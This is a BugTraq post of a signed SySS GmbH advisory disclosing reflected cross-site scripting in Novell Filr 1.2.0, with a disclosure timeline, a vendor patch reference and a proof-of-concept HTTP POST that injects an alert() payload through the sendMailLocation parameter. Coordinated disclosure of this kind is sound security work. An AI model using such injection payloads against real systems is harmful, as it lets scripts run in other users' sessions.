BugTraq
[SYSS-2015-055] Novell Filr - Cross-Site Scripting (CWE-79) Feb 19 2016 01:01PM
erlijn vangenuchten syss de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-055
Product: Novell Filr
Vendor: Novell
Affected Version(s): 1.2.0 build 846
Tested Version(s): 1.2.0 build 846
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Vendor Notification: 2015-09-17
Solution Date: 2015-12-16
Public Disclosure: 2016-01-12
CVE Reference: Not assigned
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Novell's Filr is an application for mobile file access and collaborative
file sharing [1]. High security is an important aspect of the application.

The SySS GmbH could find two reflected cross-site scripting
vulnerabilities in the Filr Web application.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH identified that it is possible to inject JavaScript code
via the parameter "sendMailLocation".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

When looking at the details for a certain file, it is possible to send
an e-mail to a colleague. When the following HTTP POST request is sent

POST /ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_emai
l&ssUsersIdsToAdd=163&entryId=1243&novl_url=1 HTTP/1.1
Host: [host]
Referer: https://[host]/ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=s
end_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1
Cookie: JSESSIONID=[sessionid]
Content-Length: 684

sendMailLocation=https%3A%2F%2F[host]%2Fssf%2Fa%2Fdo%3Fp_name%3Dss_forum
%26p_action%3D1%26binderId%3D422%26action%3Dsend_entry_email%26ssUsersId
sToAdd%3D163%26entryId%3D1232%26novl_url%3D17"%3balert(1)%2f%2f&ssUsersI
dsToAdd=163&addresses=[email address]&self=on&users=+163+&searchText=&searchText_type=&searchText_sel
ected=&groups=&searchText=&searchText_type=&searchText_selected=&ccusers
=&searchText=&searchText_type=&searchText_selected=&ccgroups=&searchText
=&searchText_type=&searchText_selected=&bccusers=&searchText=&searchText
_type=&searchText_selected=&bccgroups=&searchText=&searchText_type=&sear
chText_selected=&subject=[subject]&mailBody=%3Cp%3E[content]%3C%2Fp%3E&o
kBtn=Senden

an e-mail status is provided. When the button to return to the previous
page is clicked, the JavaScript code is executed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to information by Novell, "a fix for this issue is available in
the Filr 1.2 Hot Patch 4, available via the Novell Patch Finder".

https://www.novell.com/support/kb/doc.php?id=7017078

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-09-15: Vulnerability discovered
2015-09-17: Vulnerability reported to vendor
2015-12-16: Vulnerability published by vendor
2016-01-12: Vulnerability published by SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Novell Filr Web site
https://www.novell.com/products/filr/
[1] SySS GmbH, SYSS-2015-055
https://www.syss.de/advisories/SYSS-2015-055.txt
[2] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Erlijn van Genuchten of
the SySS GmbH.

E-Mail: erlijn.vangenuchten (at) syss (dot) de [email concealed]
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGe
nuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJWlR6MAAoJEAylhje9lv8qvRYP/RVh7yLzPthf8I2uM1nfGPwG
AsL+ajdHXVbWJrjHpaIUNwj8zpwQGZ2xVODI6vbt65u5W0gFL7M7HBNUizc+1M5Y
iAUcZXXdDMXcatZfQAW9UDH3ukuz99QIOUHQjFCdxhj+8smX+N+WA7XXEOTS4t+h
8ZvJPNJYEjSxcT8Bw8yt2EFJQaXENbS57MRMuYHQlHPSwOlKMxgNbkGNcfoz50Bp
JCt4u6XCoa1vj4rueAeXLfceyThbBQqdZUo5PGrN+v7N0d+CMYTQ4qp/2J8JSmZE
kCFobKP2pcIpXFFitw+cnzx/pFiK7cnmSxn82mA12Wh8m7knfBTaxqW4mmPsiGzk
KmWvq9JMgI+zy6xei10dzpoxQuDiWXG+SKeP236iHEBo77FpZU6HtIpYM6anAe/A
obr1u0iN8gVBT2dsuXbfeA2MIbwZvkLuTycFpTofL+nQzZM1pIh1QKXQ4rpv6Gjs
RQbliQJmBuEznT/JBceEML3X5VO32jNw0x6sMG8QFXhHAKFNo93IhsMvX0Opfq9C
qeyT3TYrb/kcFaLK/wD6stDCiTMPsEkki1xgodcSKjsfUNcDUvt1lKU6VUBoKvm5
5UfZEqwmOb2XjJNmKED0cedcXKmkkhLK2nNoDEMP5IPyWlyLeszP/1SazfPAVZMU
XJuH8TA6YBt+CyUg3WNZ
=lvzi
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus